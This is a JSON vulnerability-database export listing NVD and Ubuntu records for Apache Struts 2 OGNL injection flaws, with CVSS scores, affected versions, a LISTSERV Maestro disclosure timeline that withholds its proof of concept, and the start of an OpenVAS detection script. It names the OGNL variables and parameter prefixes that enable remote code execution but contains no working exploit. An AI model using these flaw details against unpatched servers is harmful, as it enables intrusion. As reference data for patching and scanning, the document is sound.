"cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:23:45", "description": "Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.", "cvss3": {}, "published": "2013-07-10T19:55:00", "type": "cve", "title": "CVE-2013-1965", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965"], "modified": 
"2019-08-12T21:15:00", "cpe": ["cpe:/a:apache:struts2-showcase:2.3.13"], "id": "CVE-2013-1965", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1965", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts2-showcase:2.3.13:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:54:40", "description": "Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.", "cvss3": {}, "published": "2012-09-05T23:55:00", "type": "cve", "title": "CVE-2012-4387", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4387"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.0.12", 
"cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.1.1"], "id": "CVE-2012-4387", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4387", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:38:20", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.", "cvss3": {}, "published": "2012-01-08T15:55:00", "type": "cve", "title": "CVE-2012-0391", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2018-11-23T14:36:00", "cpe": [], "id": "CVE-2012-0391", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T11:58:32", "description": "Apache Struts 2.x before 2.3.28 allows remote attackers to execute arbitrary code via a \"%{}\" sequence in a tag attribute, aka forced double OGNL evaluation.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2016-04-12T16:59:00", "type": "cve", "title": "CVE-2016-0785", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0785"], "modified": "2019-08-23T15:50:00", "cpe": ["cpe:/a:apache:struts:2.3.24.1"], "id": "CVE-2016-0785", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0785", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:48:46", "description": "Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.", "cvss3": {}, "published": "2012-03-02T22:55:00", "type": "cve", "title": "CVE-2012-0838", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0838"], "modified": "2018-12-07T16:22:00", "cpe": ["cpe:/a:apache:struts:2.2.3"], "id": "CVE-2012-0838", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0838", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:23:47", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.", "cvss3": {}, "published": "2013-07-10T19:55:00", "type": "cve", "title": "CVE-2013-1966", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2013-1966", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1966", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T14:01:37", "description": "Apache Struts 2.x before 2.3.29 allows remote attackers to execute arbitrary code via a \"%{}\" sequence in a tag attribute, aka forced double OGNL evaluation. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0785.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-16T16:29:00", "type": "cve", "title": "CVE-2016-4461", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0785", "CVE-2016-4461"], "modified": "2019-05-01T20:17:00", "cpe": ["cpe:/a:netapp:oncommand_balance:-"], "id": "CVE-2016-4461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4461", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2022-08-04T14:24:39", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute\narbitrary OGNL code via a request with a crafted action name that is not\nproperly handled during wildcard matching, a different vulnerability than\nCVE-2013-2135.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Only affects Struts 2\n", "cvss3": {}, "published": "2013-07-16T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2134", 
"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2013-07-16T00:00:00", "id": "UB:CVE-2013-2134", "href": "https://ubuntu.com/security/CVE-2013-2134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:36:19", "description": "The OGNL extensive expression evaluation capability in XWork in Struts\n2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly\nother products, uses a permissive whitelist, which allows remote attackers\nto modify server-side context objects and bypass the \"#\" protection\nmechanism in ParameterInterceptors via the (1) #context, (2)\n#_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6)\n#_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9)\n#_keepLastEvaluation, and possibly other OGNL context variables, a\ndifferent vulnerability than CVE-2008-6504.", "cvss3": {}, "published": "2010-08-17T00:00:00", "type": "ubuntucve", "title": "CVE-2010-1870", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2008-6504", "CVE-2010-1870"], "modified": "2010-08-17T00:00:00", "id": "UB:CVE-2010-1870", "href": "https://ubuntu.com/security/CVE-2010-1870", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:10:53", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method\nreferences when used with OGNL before 3.0.12, which allows remote attackers\nto cause a denial of service (block access to a web site) via unspecified\nvectors.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | struts 2.x only\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-06-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-3093", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2016-06-07T00:00:00", "id": "UB:CVE-2016-3093", "href": "https://ubuntu.com/security/CVE-2016-3093", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:24:39", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute\narbitrary OGNL code via a request with a crafted value that 
contains both\n\"${}\" and \"%{}\" sequences, which causes the OGNL code to be evaluated\ntwice.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Only Struts 2 is affected\n", "cvss3": {}, "published": "2013-07-16T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2135", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2135"], "modified": "2013-07-16T00:00:00", "id": "UB:CVE-2013-2135", "href": "https://ubuntu.com/security/CVE-2013-2135", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:24:35", "description": "Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute\narbitrary OGNL expressions via a parameter with a crafted (1) action:, (2)\nredirect:, or (3) redirectAction: prefix.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Only affected Struts 2 The bulk of the patch appears to be in http://svn.apache.org/viewvc?view=revision&revision=1502979 I've reviewed libstruts1.2-java code and could not find analogous code in our codebase.\n", "cvss3": {}, "published": "2013-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2251", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-20T00:00:00", "id": "UB:CVE-2013-2251", "href": "https://ubuntu.com/security/CVE-2013-2251", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:24:40", "description": "Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before\n2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a\ncrafted parameter name that is not properly handled when invoking a\nredirect.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | per Debian, only affects Struts 2\n", "cvss3": {}, "published": "2013-07-10T00:00:00", "type": "ubuntucve", "title": "CVE-2013-1965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965"], "modified": "2013-07-10T00:00:00", "id": "UB:CVE-2013-1965", "href": "https://ubuntu.com/security/CVE-2013-1965", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:28:37", "description": "Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial\nof service (CPU consumption) via a long parameter name, which is processed\nas an OGNL expression.", "cvss3": {}, "published": "2012-09-05T00:00:00", "type": "ubuntucve", "title": "CVE-2012-4387", "bulletinFamily": "info", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4387"], "modified": "2012-09-05T00:00:00", "id": "UB:CVE-2012-4387", "href": "https://ubuntu.com/security/CVE-2012-4387", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:31:26", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets\nparameter values as OGNL expressions during certain exception handling for\nmismatched data types of properties, which allows remote attackers to\nexecute arbitrary Java code via a crafted parameter.\n\n#### Bugs\n\n * <https://issues.apache.org/jira/browse/WW-3668>\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "ubuntucve", "title": "CVE-2012-0391", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-01-08T00:00:00", "id": "UB:CVE-2012-0391", "href": "https://ubuntu.com/security/CVE-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:12:10", "description": "Apache Struts 2.x before 2.3.28 allows remote attackers to 
Exploitation of this vulnerability does not\nrequire authentication and can lead to root level privilege on any system\nrunning the LISTServ Maestro services.\n\n \n\nVulnerability Disclosure Timeline:\n\n==================================\n\n2020-10-12: Contact Vendor and Request Security Contact Info From Support\nTeam\n\n2020-10-12: Report Vulnerability Information to Vendor\n\n2020-10-12: Vendor Confirms Submission\n\n2020-10-13: Vendor Releases Patch\n\n2020-10-13: Securifera Confirms With Vendor that the Patch Mitigates\nCVE-2010-1870 but suggest upgrading vulnerable struts library\n\n2020-10-15: Vendor Approves Public Disclosure\n\n \n\n \n\nAffected Product(s):\n\n====================\n\nLISTSERV Maestro 9.0-8 and prior\n\n \n\nSeverity Level:\n\n===============\n\nHigh\n\n \n\nProof of Concept (PoC):\n\n=======================\n\nA proof of concept will not be provided at this time.\n\n \n\nSolution - Fix & Patch:\n\n=======================\n\nTemporary patch:\nhttps://dropbox.lsoft.us/download/LMA9.0-8-patch-2020-10-13.zip\n", "sourceHref": "https://0day.today/exploit/35084", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2018-01-15T13:08:51", "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "cvss3": {}, "published": "2013-07-23T00:00:00", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2018-01-11T00:00:00", "id": "OPENVAS:803837", "href": "http://plugins.openvas.org/nasl.php?oid=803837", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_java_method_exec_vuln.nasl 8373 2018-01-11 10:29:41Z cfischer $\n#\n# Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution 
Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(803837);\n script_version(\"$Revision: 8373 $\");\n script_cve_id(\"CVE-2013-1966\", 